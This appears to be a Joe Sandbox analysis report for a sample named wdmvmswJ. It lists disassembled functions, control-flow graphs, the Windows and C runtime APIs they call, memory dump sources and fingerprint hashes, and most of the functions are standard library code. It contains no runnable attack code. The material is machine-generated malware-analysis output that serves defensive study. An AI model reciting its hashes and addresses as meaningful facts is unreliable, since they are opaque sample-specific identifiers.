                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 404 4057b0-4057cd 405 4057d3-4057d5 404->405 406 4059c6-4059ce 404->406 405->406 407 4057db-4057ea call 40b84d 405->407 410 4057f0-405834 call 403080 407->410 411 405921-40592a 407->411 414 405837-40583c 410->414 414->414 415 40583e-40584f call 40b84d 414->415 418 405855-40585b 415->418 419 40591c call 405160 415->419 420 405860-405868 418->420 419->411 420->420 422 40586a-40586f 420->422 423 405870-405872 422->423 424 405874 423->424 425 405877-40587b 423->425 424->425 426 405881 425->426 427 40587d-40587f 425->427 428 405885-405889 426->428 427->426 427->428 429 405897-405899 428->429 430 40588b-40588d 428->430 432 4058a5-4058a7 429->432 433 40589b-4058a3 429->433 430->429 431 40588f-405895 430->431 434 4058cc-4058cf 431->434 435 4058b3-4058b5 432->435 436 4058a9-4058b1 432->436 433->434 437 4058d1-4058d9 434->437 438 4058db-4058e0 434->438 439 4058c1-4058c8 435->439 440 4058b7-4058bf 435->440 436->434 437->423 437->438 438->419 441 4058e2-4058e4 438->441 439->434 440->434 442 4058e6-405916 call 404ce0 call 40b84d 441->442 443 40592b-40594e call 40b84d call 4071a0 441->443 442->419 453 405918-40591a 442->453 443->419 452 405950-405953 443->452 452->419 454 405955-40596e call 40bfc1 452->454 453->419 453->454 457 405970-40597a call 40cb9d 454->457 458 40597c-40597d call 40c953 454->458 462 405982-40598a 457->462 458->462 462->419 463 40598c-405990 462->463 464 405992-4059a2 463->464 465 4059a3-4059c5 call 405000 call 40c8e5 463->465
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040B84D: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _malloc$AllocHeap
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1883755663-2310465506
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 470 40bcc2-40bcde 471 40bce0-40bce3 470->471 472 40bd01 470->472 471->472 474 40bce5-40bce7 471->474 473 40bd03-40bd07 472->473 475 40bd08-40bd0d 474->475 476 40bce9-40bcf8 call 40bfc1 474->476 477 40bd1c-40bd1f 475->477 478 40bd0f-40bd1a 475->478 484 40bcf9-40bcfe call 40e744 476->484 481 40bd21-40bd29 call 40ba30 477->481 482 40bd2c-40bd2e 477->482 478->477 480 40bd3d-40bd50 478->480 487 40bd52-40bd58 480->487 488 40bd5a 480->488 481->482 482->476 486 40bd30-40bd3b 482->486 484->472 486->476 486->480 489 40bd61-40bd63 487->489 488->489 492 40be53-40be56 489->492 493 40bd69-40bd70 489->493 492->473 495 40bd72-40bd77 493->495 496 40bdb6-40bdb9 493->496 495->496 497 40bd79 495->497 498 40be23-40be2d call 40fc07 496->498 499 40bdbb-40bdbf 496->499 500 40beb4 497->500 501 40bd7f-40bd83 497->501 505 40beb8-40bec1 498->505 517 40be33-40be37 498->517 503 40bde0-40bde7 499->503 504 40bdc1-40bdca 499->504 500->505 508 40bd85 501->508 509 40bd87-40bd8a 501->509 506 40bde9 503->506 507 40bdeb-40bdee 503->507 511 40bdd5-40bdda 504->511 512 40bdcc-40bdd3 504->512 505->473 506->507 513 40bdf4-40be0a call 40fa20 call 4102f4 507->513 514 40be87-40be8b 507->514 508->509 515 40bd90-40bdb1 call 4103f1 509->515 516 40be5b-40be61 509->516 518 40bddc-40bdde 511->518 512->518 539 40be10-40be13 513->539 540 40bec6-40beca 513->540 523 40be9d-40beaf call 40bfc1 514->523 524 40be8d-40be9a call 40ba30 514->524 532 40be4b-40be4d 515->532 519 40be72-40be82 call 40bfc1 516->519 520 40be63-40be6f call 40ba30 516->520 517->514 525 40be39-40be48 517->525 518->507 519->484 520->519 523->484 524->523 525->532 532->492 532->493 539->500 541 40be19-40be21 539->541 540->505 541->532
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 542 4017e0-4017e7 543 4017f3-4017f9 542->543 544 4017e9-4017ee EntryPoint 542->544 545 401805-40180c 543->545 546 4017fb-401800 EntryPoint 543->546 544->543 547 401818-40181c 545->547 548 40180e-401813 EntryPoint 545->548 546->545 549 401858-40185c 547->549 550 40181e-401822 547->550 548->547 553 401847 549->553 554 40185e-401866 call 40b743 549->554 551 401824-401832 call 40b783 550->551 552 40183e-401844 call 40b6b5 550->552 564 401834-401839 EntryPoint 551->564 565 401869-40186b 551->565 552->553 557 401849-40184c 553->557 554->565 561 40186d-40186f 557->561 562 40184e-401853 EntryPoint 557->562 562->549 564->552 565->557
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • EntryPoint.WDMVMSWJ(80070057), ref: 004017EE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,2C2D8410), ref: 0040101C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                                                                                                                                                                                                                                                                                                          • EntryPoint.WDMVMSWJ(80070057), ref: 00401800
                                                                                                                                                                                                                                                                                                                                                                                                                          • EntryPoint.WDMVMSWJ(80070057), ref: 00401813
                                                                                                                                                                                                                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00401828
                                                                                                                                                                                                                                                                                                                                                                                                                          • EntryPoint.WDMVMSWJ(8007000E), ref: 00401839
                                                                                                                                                                                                                                                                                                                                                                                                                          • EntryPoint.WDMVMSWJ(8007000E), ref: 00401853
                                                                                                                                                                                                                                                                                                                                                                                                                          • _calloc.LIBCMT ref: 00401861
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1721462702-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 566 414738-414753 call 40e1d8 call 410735 571 414755-414759 566->571 572 414777-4147a0 call 40d6e0 call 4146fa call 4147a2 566->572 571->572 574 41475b-414760 call 410735 571->574 579 414763-414765 572->579 574->579 581 414767-41476e call 40e79a 579->581 582 41476f-414776 call 40e21d 579->582 581->582
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 605 40c73d-40c743 call 40e1d8 609 40c6c7-40c6df call 40fb29 call 40fa20 605->609 610 40c6ac-40c6c5 call 40bfc1 call 40e744 605->610 620 40c6e1-40c6eb call 40fa20 609->620 621 40c70f 609->621 619 40c72c-40c731 call 40e21d 610->619 620->621 629 40c6ed-40c70d call 40fa20 * 2 620->629 622 40c714-40c72a call 40c735 621->622 622->619 629->622
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2805327698-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 644 413fcc-413fe7 call 40e1d8 call 410735 649 414006-41401e call 40d6e0 644->649 650 413fe9-413fed 644->650 655 414020-414022 649->655 656 414056-414062 call 414067 649->656 650->649 652 413fef 650->652 654 413ff2-413ff4 652->654 657 413ff6-413ffd call 40e79a 654->657 658 413ffe-414005 call 40e21d 654->658 660 414024-41402d InterlockedDecrement 655->660 661 41403e-414050 InterlockedIncrement 655->661 656->654 657->658 660->661 665 41402f-414035 660->665 661->656 665->661 668 414037-41403d call 40b6b5 665->668 668->661
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?,00421490,0000000C,0040ECE6,20A11908,?,0040ED21,?), ref: 00414025
                                                                                                                                                                                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(20A116A8,00421490,0000000C,0040ECE6,20A11908,?,0040ED21,?), ref: 00414050
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
